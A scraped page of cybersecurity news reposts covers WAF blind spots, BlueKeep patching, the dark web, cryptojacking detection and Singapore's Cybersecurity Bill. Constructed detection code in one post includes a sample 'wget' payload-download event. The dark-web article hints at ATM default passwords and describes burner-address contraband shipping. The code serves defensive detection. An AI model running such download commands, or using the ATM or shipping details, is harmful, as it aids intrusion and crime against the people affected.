#cyberfraud | #cybercriminals | What You Need to Know

Source: National Cyber Security – Produced By Gregory Evans. Guest contribution by Harold Kilpatrick, PR Consultancy. A recent study showed that 66% of consumers had made an online purchase as a result of marketing campaigns. But most don’t even need research to know how useful email marketing can be. Between extensive reach, low cost, and […]

#deepweb | A Guide to Everything You Need to Know About Dark Data

We are living in a world where data is a currency, offering businesses leverage in the market. Hence data ought to be treated as a resource that needs to be exploited to its maximum potential. Normally, companies make use of structured data to collect information. However, […]

#cybersecurity | #hackerspace | Will Your WAF Know When You Are Compromised?


In my last blog post “The Existential Crisis of a WAF,” I talked through the consequences of an attack getting through either by a rule not matching, a device misconfiguration, or traffic obfuscation. The latter includes the inability to decrypt and parse the traffic, which was the case with the Equifax breach. I also discussed Trusted Execution™, a new technology that provides huge value over the rule-based network security devices, including:

  1. Protection against Zero-Day attacks
  2. No False Positives = No Tuning and No Learning
  3. Visibility of the full “Kill-Chain”
  4. Blocking action at any phase of the Kill-Chain
  5. Very low Total Cost of Ownership

In this second installment, I thought I would explore the true cost in man-hours of a rule-based network security device such as a WAF, NG firewall, or IDS/IPS. I am not going to put a number to the scenario below; instead I want you to think about what the real cost is to you and your organization.

Good Guy Defensive Hacker Training

But first, I want to take a stroll down Memory Lane (no overflows, please…). When I was a young buck in the Air Force, I became an expert at the various IDS and firewall devices that were deployed at the time. One of the firewalls I was managing had several protocol “proxies,” including one for HTTP, which made it capable of understanding web traffic at the upper layers of the OSI stack and enforcing a negative security model for that protocol. In this sense, you can say that this firewall was the predecessor of the WAF. It protected the base’s web page and several employee portals, which was cutting-edge at the time. Every day I would come in and sift through the firewall logs to make sure no big red flags were present. I thought I was so cool, being the only one on base able to read the mountains of log entries.

That all changed when I was selected to attend a DOD Unix Security Course, where I was first introduced to the buffer-overflow exploits against the Unix finger and sendmail services, the exploits that allowed the famed Morris Worm to be so successful in 1988 (

I learned how to think like a hacker: carefully performing target selection, reconnaissance, enumeration, exploitation, and finally ways to cover my tracks. I also learned methods to meticulously lock down a system in order to defend it against hacking. To conclude the course, everyone in our training competed in a “Capture the Flag” exercise, which was both exhilarating and enlightening. In the end, I was completely pumped about cybersecurity. Who knew learning hacking techniques would open up new possibilities and turn my professional world upside down?! Sure, in the past I had dabbled in hacking, but that was more with services like SMTP and FTP, and rudimentary password cracking. Slackware Linux was just gaining popularity as a free Unix-ish operating system you could use for hacking, so serious hacking was restricted to licensed Unix and Solaris systems, which were cost-prohibitive for the novice.

As Awareness Increases, a Scarier Reality Emerges

Knowing more also had its challenges. When I got back into my daily job reviewing firewall logs, I started to ask the tough “What If” questions: What if I messed up the firewall and exposed us? What if an attack got through? What if there is a hacker in our systems RIGHT NOW??? I could get court-martialed for incompetence! Shortly after my Unix Security training, the Air Force decided to classify all Information Systems as Weapon Systems. This meant that now we had to perform an extensive security audit, classification, and readiness accreditation of every IT system on base. I had to draft the contingency plans to cover the possibility of a compromised system. That led to an extremely important question – perhaps the most important question a security guy can ask:

“If we were compromised, how would I know?”

How Do You Know If Your Network Is Compromised?

Fast-forward to today, and guess what? That question is still a very valid one – How do you know if you are compromised? If you manage ANY security product, the one fact you have to accept is that you don’t know what you don’t know. Meaning, if an attack is not recognized by your security device for any of the reasons mentioned at the beginning of this post, can you prove that you were (or weren’t) compromised?

Consider this scenario: If I create a script to scan for all 34 documented CVEs that are related to Nginx web server (assuming each of them can be tested from the network), and I slip in one or two Zero-Day tests that actually get through (Yay Me!), for a single IP address targeted, what count of WAF alerts will you have? IDS alerts? Firewall alerts?

Thankfully, you may have a SIEM that gives you a grand total of 153 alerts (a completely arbitrary number) for the total count of devices in the path, including that shiny new RASP you just installed on the targeted server. Now what? What is the contingency plan to make sure every security device did its job and blocked the 34 attacks? Or is it 36? Or is it 100? Do you really know???

It just so happens that attack number 35 was a file-less buffer overflow that had not yet been released to the public, and I now own the box with at least the privileges of the Nginx process. (Inquire about our Nginx Attack Demo.) I am now “living off the land” until I am discovered. This period is called Dwell Time, and the clock is ticking until I am discovered, so I have to work fast to secure the beachhead and cover my tracks. Having generated enough “noise” with the other attacks, I am keeping you (the Security Administrator) busy trying to figure out what just happened. Chances are good you won’t find out I’m in your network for a while.

Choose Between Blind Action or No Action?

So, now what? What is your course of action if you think an attack may have happened but you’re not sure? Without the sufficient evidence that the breach attempt was successful, can you request that the server be quarantined? How long will it take to sift through all the alerts and document the attack to give enough compelling evidence to justify disrupting business? Can the server just be replaced with a known-good image? What is the real cost of reacting to an attack? Or of not reacting? AND will you always react this way EVERY SINGLE TIME you see a flutter of alerts coming from an opportunistic web scanner?

20/20 Virsec Vision

I now have to ask another “What If” question: What if you had a tool in your toolbox that showed exactly what did, or did not, happen to that Nginx web server? What if you could open up the Virsec UI and see that an attack got through the network, but Virsec did its job and killed the offending spawned process? Virsec’s Trusted Execution technology detected the buffer overflow, saw the Nginx process jump from an authorized memory location to an unauthorized memory location, then triggered a Micro-Protection action that killed the offending Process ID, returning the application to smooth operation. No guesswork, no forensics, no quarantining, just a copacetic server humming along, serving out its share of inconvenienced electrons in the form of web pages.

Virsec In Action

In the example below, the Virsec system is in monitoring mode so we can see the entire Kill Chain of the attack. Starting from the bottom line and working up, it begins with a Buffer Overflow, where the system detects a jump to a memory location not intended by the application. We then see hostname executed, followed by a wget that creates a file, modifies it, then deletes it.

Usually Buffer Overflow attacks are extremely hard to detect with conventional security products, but Virsec would have killed the offending process at the first alert, thereby stopping attackers in their tracks.
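To make the kill chain above concrete, here is an added example (constructed for this post, not Virsec's code or output): a small detector that walks simplified endpoint process and file events, flags any non-server child spawned by an nginx process, and reassembles the descendants' activity into one ordered chain. A process log only sees the spawn, not the memory jump that Trusted Execution alerts on, so that spawn is the earliest signal this approach gets. All pids, paths and the download URL are placeholders.

```python
"""Reconstruct a web-server kill chain from process and file events.

Constructed example, not Virsec's code: a minimal detector that walks
simplified endpoint events, flags any non-server child spawned by an nginx
process (a worker serving pages should never exec anything) and assembles
the descendants' exec and file activity into one time-ordered chain.
"""
from collections import defaultdict

WEB_SERVER_COMMS = {"nginx", "apache2", "httpd"}

# Constructed sample events: (timestamp, kind, fields). Kinds:
#   "exec" -> pid, ppid, comm, cmdline      "file" -> pid, action, path
# pids, paths and the download URL are placeholders, not real indicators.
SAMPLE_EVENTS = [
    (100.0, "exec", {"pid": 1200, "ppid": 1, "comm": "nginx",
                     "cmdline": "nginx: master process"}),
    (100.1, "exec", {"pid": 1201, "ppid": 1200, "comm": "nginx",
                     "cmdline": "nginx: worker process"}),
    (200.0, "file", {"pid": 1201, "action": "read",
                     "path": "/var/www/html/index.html"}),
    # the overflow lands here; the first thing a process log can see is the spawn
    (300.5, "exec", {"pid": 4410, "ppid": 1201, "comm": "sh",
                     "cmdline": "sh -c hostname"}),
    (300.6, "exec", {"pid": 4411, "ppid": 4410, "comm": "hostname",
                     "cmdline": "hostname"}),
    (301.0, "exec", {"pid": 4412, "ppid": 1201, "comm": "wget",
                     "cmdline": "wget -O /tmp/.x http://placeholder.invalid/x"}),
    (301.4, "file", {"pid": 4412, "action": "create", "path": "/tmp/.x"}),
    (301.5, "file", {"pid": 4412, "action": "modify", "path": "/tmp/.x"}),
    (302.0, "file", {"pid": 4412, "action": "delete", "path": "/tmp/.x"}),
    (400.0, "exec", {"pid": 5000, "ppid": 1, "comm": "cron", "cmdline": "cron"}),
]


def build_process_table(events):
    """Map pid -> (ppid, comm, cmdline) from the exec events."""
    return {f["pid"]: (f["ppid"], f["comm"], f["cmdline"])
            for _ts, kind, f in events if kind == "exec"}


def descendants(roots, table):
    """Every pid reachable from roots (inclusive) by following ppid links."""
    children = defaultdict(list)
    for pid, (ppid, _comm, _cmd) in table.items():
        children[ppid].append(pid)
    seen, stack = set(), list(roots)
    while stack:
        pid = stack.pop()
        if pid not in seen:
            seen.add(pid)
            stack.extend(children[pid])
    return seen


def find_kill_chains(events):
    """One chain per web-server process that spawned something it should not.

    Returns dicts with the compromised server pid, the timestamp of the first
    unexpected spawn (the earliest alert available to a process-log detector)
    and the time-ordered steps taken by that spawn's whole subtree.
    """
    table = build_process_table(events)
    beachheads = defaultdict(list)        # server pid -> [(ts, child pid)]
    for ts, kind, f in events:
        if kind != "exec":
            continue
        parent = table.get(f["ppid"])
        # a master forking its workers is normal; anything else is not
        if (parent and parent[1] in WEB_SERVER_COMMS
                and f["comm"] not in WEB_SERVER_COMMS):
            beachheads[f["ppid"]].append((ts, f["pid"]))

    chains = []
    for server_pid, spawns in beachheads.items():
        lineage = descendants([pid for _ts, pid in spawns], table)
        steps = []
        for ts, kind, f in sorted(events, key=lambda e: e[0]):
            if f["pid"] not in lineage:
                continue
            if kind == "exec":
                steps.append(f"{ts:.1f} exec pid={f['pid']} {f['cmdline']}")
            else:
                steps.append(f"{ts:.1f} file {f['action']} {f['path']} by pid={f['pid']}")
        chains.append({
            "compromised_pid": server_pid,
            "first_alert": min(ts for ts, _pid in spawns),
            "steps": steps,
        })
    return chains


if __name__ == "__main__":
    for chain in find_kill_chains(SAMPLE_EVENTS):
        print(f"nginx pid {chain['compromised_pid']} spawned a child at "
              f"t={chain['first_alert']}; kill chain:")
        for step in chain["steps"]:
            print("  ", step)
```

Against the 153-alert scenario earlier in the post, this yields a single chain tied to one worker pid, which is the kind of evidence needed before quarantining a box.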

The result? You cut costs in the form of staff-hours, prove value in defending the network, and safeguard your customers’ data from being stolen. You become the hero and they place a bronze statue of you down in the lobby. Your next stop? CISO!

I hope you enjoyed this post, and for those of you who are maintaining industry certifications, don’t forget to put in for your CPEs when you read any of our blog posts. Cheers!

Further resources:

The Existential Crisis of a WAF

Making Applications Truly Self Defending: Nine Ways That Virsec Fills Gaps in RASP Security to Deliver Full Stack Application Security Self Defense


The post Will Your WAF Know When You Are Compromised? appeared first on Virsec Systems.

*** This is a Security Bloggers Network syndicated blog from Blog – Virsec Systems authored by Mark Pelkoski. Read the original post at:


The post #cybersecurity | #hackerspace | Will Your WAF Know When You Are Compromised? appeared first on National Cyber Security.


#cybersecurity | #infosec | What you Need to Know


What is BlueKeep?

BlueKeep is the name that has been given to a security vulnerability that was discovered earlier this year in some versions of Microsoft Windows’ implementation of the Remote Desktop Protocol (RDP).

The vulnerability was described as “wormable” by Microsoft, and users were warned that BlueKeep might be exploited in a similar fashion to how the WannaCry ransomware used the EternalBlue vulnerability to spread widely in 2017.

Warnings about the BlueKeep vulnerability have been issued by the UK’s National Cyber Security Centre (NCSC), the United States’ National Security Agency (NSA), and their equivalent agencies in Germany and Australia, as well as by Microsoft itself.

Microsoft considered the threat posed by BlueKeep to be so serious that the software giant took the unusual step of releasing patches for no-longer supported versions of Windows such as Windows Server 2003, Windows Vista, and Windows XP.

Sounds serious. Which other operating systems are vulnerable?

The RDP functionality on Windows 7 and Windows Server 2008 (both reaching the end of their support life-cycle) is also vulnerable, and should be patched as a matter of urgency.

But didn’t this all happen a while ago?

Yes, the patches from Microsoft came out in May, and although some IT teams acted fast to secure their critical Windows systems, hundreds of thousands of other internet-connected computers remain unpatched to this day.

So what have bad guys been doing with the BlueKeep vulnerability?

For some months it seemed not much was happening. But recently an attack was seen in the wild which attempted to install cryptomining software onto RDP servers that had not been patched, and had exposed port 3389 to the internet.

You said “attempted”…

Yes, the attack – first spotted by security researcher Kevin Beaumont – caused systems to crash with the infamous “blue screen of death.”

According to a ZDNet report, the attack failed because of an incompatibility between the exploit code and a patch Microsoft had previously issued for the Intel CPU vulnerability known as Meltdown.

So, having vulnerable computers crash is bad but better than having them compromised by malicious code, right?

Right. If a computer crashes it might alert you that something’s wrong, and is certainly better than an attacker silently installing unauthorised code.

But it is widely expected that a revised version of the BlueKeep exploitation code will be issued this week which will NOT cause Meltdown-patched computers to crash.

So what should we do?

  • Patch your vulnerable computers now, with the fixes Microsoft issued earlier this year.
  • Block port 3389 (used by the RDP protocol) at your firewalls, especially for systems exposed to the internet.
  • Disable remote desktop services if they are not required.
  • Enable Network Level Authentication (NLA) to control who connects to your systems, and protect your network from unauthorised users and software.

Editor’s Note: The opinions expressed in this guest author article are solely those of the contributor, and do not necessarily reflect those of Tripwire, Inc.


The post #cybersecurity | #infosec | What you Need to Know appeared first on National Cyber Security.


#nationalcybersecuritymonth | Do You Know How To Protect Yourself Against Phishing Emails? – University Times

Illustration by Lauren Dahncke. National Cybersecurity Awareness Month recently came to an end, but phishing emails never seem to. According to Cal State LA’s Information Technology Security, phishing emails are sent to the recipient with the purpose […]

#deepweb | Dark web websites: 10 things you should know


Back in the 1970s, “darknet” wasn’t an ominous term: it simply referred to networks that were isolated from the mainstream of ARPANET for security purposes. But as ARPANET became the internet and then swallowed up nearly all the other computer networks out there, the word came to identify areas that were connected to the internet but not quite of it, difficult to find if you didn’t have a map.

The so-called dark web, a catch-all phrase covering the parts of the internet not indexed by search engines, is the stuff of grim legend. But like most legends, the reality is a bit more pedestrian. That’s not to say that scary stuff isn’t available on dark web websites, but some of the whispered horror stories you might’ve heard don’t make up the bulk of the transactions there.

We spoke to some security pros who offered to give us a bit of a guided tour of the web’s nether regions. Hopefully it will demystify things a bit.

Here are ten things you might not know about the dark web.

New dark web sites pop up every day…

A 2015 white paper from threat intelligence firm Recorded Future examines the linkages between the Web you know and the darknet. The paths usually begin on sites like Pastebin, originally intended as an easy place to upload long code samples or other text but now often where links to the anonymous Tor network are stashed for a few days or hours for interested parties. 

While searching for dark web sites isn’t as easy as using Google—the point is to be somewhat secretive, after all—there are ways to find out what’s there. The screenshot below was provided by Radware security researcher Daniel Smith, and he says it’s the product of “automatic scripts that go out there and find new URLs, new onions, every day, and then list them. It’s kind of like Geocities, but 2018”—a vibe that’s helped along by pages with names like “My Deepweb Site,” which you can see on the screenshot.

[Screenshot: fresh onions listing. Credit: Daniel Smith]

…and many are perfectly innocent

Matt Wilson, chief information security advisor at BTB Security, says that “there is a tame/lame side to the dark web that would probably surprise most people. You can exchange some cooking recipes—with video!—send email, or read a book. People use the dark web for these benign things for a variety of reasons: a sense of community, avoiding surveillance or tracking of internet habits, or just to do something in a different way.”

It’s worth remembering that what flourishes on the darknet is material that’s been banned elsewhere online. For example, in 2015, in the wake of the Chinese government cracking down on VPN connections through the so-called “great firewall,” Chinese-language discussions started popping up on the darknet — mostly full of people who just wanted to talk to each other in peace.

Radware’s Smith points out that there are a variety of news outlets on the dark web, ranging from the news website from the hacking group Anonymous to the New York Times, shown in the screenshot here, all catering to people in countries that censor the open internet.

[Screenshot: New York Times onion site. Credit: Daniel Smith]

Some spaces are by invitation only

Of course, not everything is so innocent, or you wouldn’t be bothering to read this article. Still, “you can’t just fire up your Tor browser and request 10,000 credit card records, or passwords to your neighbor’s webcam,” says Mukul Kumar, CISO and VP of Cyber Practice at Cavirin. “Most of the verified ‘sensitive’ data is only available to those that have been vetted or invited to certain groups.”

How do you earn an invite into these kinds of dark web sites? “They’re going to want to see history of crime,” says Radware’s Smith. “Basically it’s like a mafia trust test. They want you to prove that you’re not a researcher and you’re not law enforcement. And a lot of those tests are going to be something that a researcher or law enforcement legally can’t do.”

There is bad stuff, and crackdowns mean it’s harder to trust

As recently as last year, many dark web marketplaces for drugs and hacking services featured corporate-level customer service and customer reviews, making navigating simpler and safer for newbies. But now that law enforcement has begun to crack down on such sites, the experience is more chaotic and more dangerous.

“The whole idea of this darknet marketplace, where you have a peer review, where people are able to review drugs that they’re buying from vendors and get up on a forum and say, ‘Yes, this is real’ or ‘No, this actually hurt me’—that’s been curtailed now that dark marketplaces have been taken offline,” says Radware’s Smith. “You’re seeing third-party vendors open up their own shops, which are almost impossible to vet yourself personally. There’s not going to be any reviews, there’s not a lot of escrow services. And hence, by these takedowns, they’ve actually opened up a market for more scams to pop up.”

Reviews can be wrong, products sold under false pretenses—and stakes are high

There are still sites where drugs are reviewed, says Radware’s Smith, but keep in mind that they have to be taken with a huge grain of salt. A reviewer might get a high from something they bought online, but not understand what the drug was that provided it.

One reason these kinds of mistakes are made? Many dark web drug manufacturers will also purchase pill presses and dyes, which retail for only a few hundred dollars and can create dangerous lookalike drugs. “One of the more recent scares that I could cite would be Red Devil Xanax,” he said. “These were sold as some super Xanax bars, when in reality, they were nothing but horrible drugs designed to hurt you.”

The dark web provides wholesale goods for enterprising local retailers…

Smith says that some traditional drug cartels make use of the dark web networks for distribution—”it takes away the middleman and allows the cartels to send from their own warehouses and distribute it if they want to”—but small-time operators can also provide the personal touch at the local level after buying drug chemicals wholesale from China or elsewhere from sites like the one in the screenshot here. “You know how there are lots of local IPA microbreweries?” he says. “We also have a lot of local micro-laboratories. In every city, there’s probably at least one kid that’s gotten smart and knows how to order drugs on the darknet, and make a small amount of drugs to sell to his local network.”

[Screenshot: Xanax listing. Credit: Daniel Smith]

…who make extensive use of the gig economy

Smith describes how the darknet intersects with the unregulated and distributed world of the gig economy to help distribute contraband. “Say I want to have something purchased from the darknet shipped to me,” he says. “I’m not going to expose my real address, right? I would have something like that shipped to an AirBnB—an address that can be thrown away, a burner. The box shows up the day they rent it, then they put the product in an Uber and send it to another location. It becomes very difficult for law enforcement to track, especially if you’re going across multiple counties.”

Not everything is for sale on the dark web

We’ve spent a lot of time talking about drugs here for a reason. Smith calls narcotics “the physical cornerstone” of the dark web; “cybercrime—selling exploits and vulnerabilities, web application attacks—that’s the digital cornerstone. Basically, I’d say a majority of the darknet is actually just drugs and kids talking about little crimes on forums.”

Some of the scarier sounding stuff you hear about being for sale often turns out to be largely rumors. Take firearms, for instance: as Smith puts it, “it would be easier for a criminal to purchase a gun in real life versus the internet. Going to the darknet is adding an extra step that isn’t necessary in the process. When you’re dealing with real criminals, they’re going to know someone that’s selling a gun.”

Specific niches are in

Still, there are some very specific darknet niche markets out there, even if they don’t have the same footprint that narcotics does. One that Smith drew my attention to was the world of skimmers, devices that fit into the slots of legitimate credit and ATM card readers and grab your bank account data.

And, providing another example of how the darknet marries physical objects for sale with data for sale, the same sites also provide data manual sheets for various popular ATM models. Among the gems available in these sheets are the default passwords for many popular internet-connected models; we won’t spill the beans here, but for many it’s the same digit repeated five times.

[Screenshot: ATM skimmers listing. Credit: Daniel Smith]

It’s still mimicking the corporate world

Despite the crackdown on larger marketplaces, many dark web sites are still doing their best to simulate the look and feel of more corporate sites. 

[Screenshot: Elude onion site. Credit: Daniel Smith]

The occasional swear word aside, for instance, the onion site for the Elude anonymous email service shown in this screenshot looks like it could come from any above-board company.

One odd feature of corporate software that has migrated to the dark web: the omnipresent software EULA. “A lot of times there’s malware I’m looking at that offers terms of service that try to prevent researchers from buying it,” says Radware’s Smith. “And often I have to ask myself, ‘Is this person really going to come out of the dark and try to sue someone for doing this?’”

And you can use the dark web to buy more dark web

And, to prove that any online service can, eventually, be used to bootstrap itself, we have this final screenshot from our tour: a dark web site that will sell you everything you need to start your own dark web site.

[Screenshot: dark web hosting kit. Credit: Daniel Smith]

Think of everything you can do there—until the next crackdown comes along.

Copyright © 2018 IDG Communications, Inc.


The post #deepweb | Dark web websites: 10 things you should know appeared first on National Cyber Security.


How to #Know If Your #Slow #Computer Is #Secretly #Mining #Cryptocurrency

Mining cryptocurrency used to require thousands of dollars worth of equipment to see any kind of meaningful return, but not anymore. Newer digital currencies like Monero, ByteCoin, and AEON have given would-be miners the ability to mine tokens right from their laptops. This might benefit small-time miners that want to get involved in the sector, but for every good thing online there are always people that figure out a way to use it for bad.

Hackers have begun using these tools to infect computers and websites to secretly mine cryptocurrencies. This emerging type of malware attack has been dubbed “cryptojacking”, and it could cause your computer to overheat and crash. Luckily, spotting these hidden miners isn’t all that difficult.

Cryptojacking essentially hijacks your computer’s CPU power to mine. This means when you’re browsing the web, the malware is running in the background completely unbeknownst to you. There are a few types of this malware, and some run only when you visit a certain website and others can be maliciously installed on your computer. The best way to prevent this is by using antivirus software and adblockers.

If you’ve already been hit with this kind of malware, you’ll notice either your computer acting sluggish, getting warmer than usual, or its fan constantly spinning. If you aren’t running any kind of demanding software, like video games or video editing programs, this should be the first hint that your computer is working overtime.

If you’ve noticed your laptop acting up, it’s time to go check on what’s going on under the hood. Mac users can view a detailed breakdown of everything their computer is running by searching “Activity Monitor” and using the magnifying glass icon at the top-right of the screen. Windows users can simply hold down the Ctrl-Alt-Del keys to bring up “Task Manager.”

Both of these menus will display a graph of how much of your computer’s processing power is being used. Any massive spikes should be red flags. You’ll also see an ordered list of the programs using the most processing power at the moment. Before ending any of these programs be sure to research what they are, as you could be ending a crucial part of your operating system.
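The Activity Monitor / Task Manager check above is a one-off glance; a miner is easier to tell apart from a game launch or a page load when you watch CPU share over a minute or so. Here is an added example (constructed for this post, not code from the original article) that does that triage over a series of snapshots: it flags only processes that stay hot, leaves known heavy apps alone, and marks OS processes as "investigate" rather than "end". The process names and sample values are invented; on a real machine the snapshots would come from whatever process monitor you use.

```python
"""Triage sustained CPU consumers over a series of process snapshots, so a
momentary spike is not confused with a miner that never lets go.

Constructed example, not the original article's code. The samples below are
invented; on a real machine they would come from a process monitor.
"""
from collections import defaultdict

HIGH_CPU_PCT = 50.0        # a process holding at least this share is "hot"
MIN_SUSTAINED_S = 30       # must stay hot this long before it counts
SAMPLE_INTERVAL_S = 5      # seconds between snapshots

# Assumed names chosen for the example; extend these sets for your machines.
EXPECTED_HEAVY = {"Final Cut Pro", "ffmpeg", "steam_app"}   # legitimately hot
BROWSERS = {"Safari", "chrome.exe", "firefox", "msedge.exe"}
OS_CRITICAL = {"kernel_task", "System", "WindowServer", "csrss.exe"}


def _snapshot(i):
    """Constructed snapshot i (one per 5 s): process name -> CPU percent."""
    return {
        "kernel_task": 4.0 + (i % 3),         # normal background load
        "Spotify": 40.0 if i == 5 else 3.0,   # one-off spike, not a miner
        "Final Cut Pro": 58.0,                # heavy but expected
        "Safari": 6.0 if i < 4 else 66.0,     # pegged once a tab was opened
        "svc_upd": 88.0,                      # unknown process, always hot
    }


SAMPLES = [_snapshot(i) for i in range(12)]   # 60 s of constructed data


def longest_hot_streak(series, threshold=HIGH_CPU_PCT):
    """Longest run of consecutive samples at or above threshold."""
    best = run = 0
    for value in series:
        run = run + 1 if value >= threshold else 0
        best = max(best, run)
    return best


def triage(samples, interval_s=SAMPLE_INTERVAL_S):
    """Return processes hot for at least MIN_SUSTAINED_S, suspects first.

    Each finding gives how long the process stayed hot, its average share while
    hot, and what to do: expected apps are listed for completeness, OS
    processes are flagged for investigation rather than termination.
    """
    names = sorted({name for snap in samples for name in snap})
    series = defaultdict(list)
    for snap in samples:
        for name in names:
            series[name].append(snap.get(name, 0.0))   # absent == 0 % CPU

    findings = []
    for name in names:
        streak = longest_hot_streak(series[name])
        if streak * interval_s < MIN_SUSTAINED_S:
            continue                                   # spike, not sustained
        hot = [v for v in series[name] if v >= HIGH_CPU_PCT]
        if name in EXPECTED_HEAVY:
            verdict = "expected: known CPU-heavy application"
        elif name in BROWSERS:
            verdict = "suspect: browser pegged; check open tabs for an in-page miner"
        elif name in OS_CRITICAL:
            verdict = "investigate: OS process, do not terminate blindly"
        else:
            verdict = "suspect: unknown process under sustained load; research it before ending it"
        findings.append({
            "process": name,
            "sustained_s": streak * interval_s,
            "avg_hot_pct": round(sum(hot) / len(hot), 1),
            "verdict": verdict,
        })
    # suspects first, then the longest-running within each group
    findings.sort(key=lambda f: (not f["verdict"].startswith("suspect"), -f["sustained_s"]))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLES):
        print(f"{f['process']:<14} {f['sustained_s']:>3}s at ~{f['avg_hot_pct']}%  {f['verdict']}")
```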

Both Tesla and the Los Angeles Times have had their sites infected by cryptojacking software. Companies with popular websites are the most at risk, as hackers can embed code onto their servers and use the CPU power of everyone who visits the site. But making it a habit to check on how your computer is running will ensure your device isn’t getting used to make someone else a crypto fortune.


The post How to #Know If Your #Slow #Computer Is #Secretly #Mining #Cryptocurrency appeared first on National Cyber Security Ventures.


Many #employees know #little about #cybersecurity #threats

Companies are surrounded by cybersecurity threats, but many are not making it a priority to educate employees about them, a survey says.

Nearly half (46%) of entry-level employees don’t know whether their company has a cybersecurity policy, according to research firm Clutch.

The survey demonstrated a lack of awareness that can put companies at risk for IT security breaches. Nearly two-thirds of employees (63%) said they don’t know whether the quantity of IT security threats their companies face will increase or decrease over the next year. Additionally, among entry-level employees, 87% said they don’t know how the number of threats will shift in the next year.

The survey also found that employees are less likely to recognize IT services as the primary area of security vulnerability at their company. Instead, they cited theft of company property as the primary threat to company security, ahead of unauthorized information and email phishing scams.

The findings are a bit ironic, because “most cyberbreaches are caused by employees, inadvertently,” Robert Anderson, co-chair of the cybersecurity and data privacy group at Lindabury, McCormick, Estabrook & Cooper, P.C., told FierceCEO.

“There is a tendency for businesses to not put the emphasis on employees, but they are the greatest vulnerability,” Anderson said.



The post Many #employees know #little about #cybersecurity #threats appeared first on National Cyber Security Ventures.


5 #Cybersecurity #Trends You Need To #Know

Source: National Cyber Security News

Cyberattacks are evolving… so must cybersecurity
If the past few years have told businesses anything, it’s that cybersecurity issues are not going to go away. Hackers, and the methods they use, are getting smarter. There are now more ways than ever for cybercriminals to exploit precious data and use it as a digital weapon. Big Data, while bringing positive disruption to business and society, has made it harder for organisations to keep track of information. So, what should organisations (and everybody else, for that matter) look out for in the next wave of cyber compromises?

1. Machine learning

According to a report by Webroot, 87 per cent of cybersecurity professionals use machine learning to predict and identify cybercrime. However, machine learning has also become a valued tool for hackers themselves. For example, artificially intelligent software can be used to automate the collection of information to get hold of data faster. It can also apply situational data to make it easier to crack passwords. Cybercriminals and cybersecurity professionals are locked in a constant game of technological cat and mouse.

2. IoT vulnerabilities

By 2020, Gartner forecasts that the Internet of Things will comprise over 20bn connected things.




Singapore #passes new #Cybersecurity Bill: Here’s what you #need to #know before it comes into #force


The Singapore Parliament passed the much discussed Cybersecurity Bill (the Bill) on 5 February 2018 and it is anticipated that the new law will come into force soon.  The new law creates a regulatory framework for the monitoring and reporting of cybersecurity threats to essential services in Singapore through the appointment of the Commissioner of Cybersecurity.  It also creates a licensing regime that will require certain data security service providers in Singapore to be registered.

We set out below four key points that you should know about this new Bill.

1. Creation of a cybersecurity regulator

The Bill provides for the appointment of a Cybersecurity Commissioner (the “Commissioner”) as a regulator for the sector.

The Bill confers on the Commissioner significant powers to respond to, and prevent, cybersecurity incidents affecting Singapore. These include powers of investigation, such as the power to examine persons, to require the production of evidence, and to seize evidence. In addition, where satisfied that a cybersecurity threat meets a specified severity threshold, the Commissioner may require a person to carry out remedial measures or to cease certain activities. These powers apply to all computers and computer systems in Singapore and are not limited to Critical Information Infrastructure (CII), which is described in further detail below.


